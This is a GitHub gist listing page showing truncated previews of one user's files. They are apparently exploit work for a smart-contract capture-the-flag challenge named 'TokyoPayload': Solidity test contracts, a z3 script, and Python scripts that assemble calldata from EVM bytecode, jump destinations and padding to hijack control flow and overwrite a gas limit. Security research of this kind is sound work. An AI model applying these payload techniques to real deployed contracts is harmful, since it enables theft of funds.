kangsangsoo
kangsangsoo
/ test5.ipynb
Created
March 30, 2025 05:25
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
kangsangsoo
/ my_rev.py
Created
November 26, 2023 00:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from z3 import * | |
| # read | |
| def m2i(mem: list): | |
| num = 0 | |
| for i in range(32): | |
| num += mem[31-i] << (i*8) | |
| return num | |
| def uint8(mem: list): |
kangsangsoo
/ Solve.sol
Created
September 22, 2023 08:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: Apache-2.0 | |
| pragma solidity 0.8.21; | |
| contract Test { | |
| bool public s; | |
| TokyoPayload public t; | |
| // address public t = 0x35F04C8fa4361849fE92fF40580A28F83011E29F; | |
| bytes public code; | |
| constructor() { |
kangsangsoo
/ make_payload.py
Created
September 22, 2023 08:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BYTECODE_LOAD = "5b803591" | |
| BYTECODE_GASLIMIT = "5b61015e60605160015556" | |
| BYTECODE_DELEGATE = "5b6000816001600160a01b031660015461ffff1660405160006040518083038186" | |
| BYTECODE_POP_4 = "5b5050505056" | |
| BYTECODE_STOP = "5b00" | |
| JUMPDEST_RET_FUNCS = "018f" | |
| JUMPDEST_LOAD = "d0" | |
| JUMPDEST_GASLIMIT = "0153" |
kangsangsoo
/ payload2.py
Created
September 22, 2023 08:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| JUMPDEST_RET_FUNCS = "018f" | |
| JUMPDEST_LOAD = "d0" | |
| JUMPDEST_GASLIMIT = "0153" | |
| JUMPDEST_POP_4 = "018f" | |
| JUMPDEST_DELEGATE = "01a3" | |
| x = "01c2" | |
| l = "371d" | |
| DUMMY = "DE" | |
| SIG_tokyoPayload = "000040c3" |
kangsangsoo
/ Test2.sol
Created
September 22, 2023 08:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: Apache-2.0 | |
| pragma solidity 0.8.21; | |
| contract Test { | |
| bool public s; | |
| TokyoPayload public t; | |
| // address public t = 0x35F04C8fa4361849fE92fF40580A28F83011E29F; | |
| bytes public code; | |
| constructor() { |
kangsangsoo
/ payload.py
Created
September 22, 2023 07:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| JUMPDEST_RET_FUNCS = "018f" | |
| JUMPDEST_LOAD = "d0" | |
| DUMMY = "DE" | |
| SIG_tokyoPayload = "000040c3" | |
| payload = SIG_tokyoPayload # func sig | |
| payload += "7b".rjust(64, "0") # x | |
| payload += JUMPDEST_LOAD.rjust(64, "0") # y => first call pointer and second call addr |
kangsangsoo
/ Test.sol
Created
September 22, 2023 07:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: Apache-2.0 | |
| pragma solidity 0.8.21; | |
| contract Test { | |
| bool public s; | |
| TokyoPayload public t; | |
| // address public t = 0x35F04C8fa4361849fE92fF40580A28F83011E29F; | |
| bytes public code; | |
| constructor() { |
kangsangsoo
/ test.sol
Created
September 20, 2023 17:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract Test { | |
| bool public res; | |
| TokyoPayload public t; | |
| constructor() { | |
| t = new TokyoPayload(); | |
| } | |
| fallback() external { | |
| res = true; |
kangsangsoo
/ my local scirpt
Created
September 17, 2023 05:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| payload = "000040c3" # tokyoPayload's sig and gasLimit to be overwritten | |
| payload += "5b".rjust(64, "0") # x | |
| payload += "01b8".rjust(64, "0") # y and second calling: resetGasLimit | |
| # dummy ------------ | |
| payload += "00" | |
| payload += "02" * 32 * 10 | |
| payload += "02" * 29 | |
| # dummy ------------ |
NewerOlder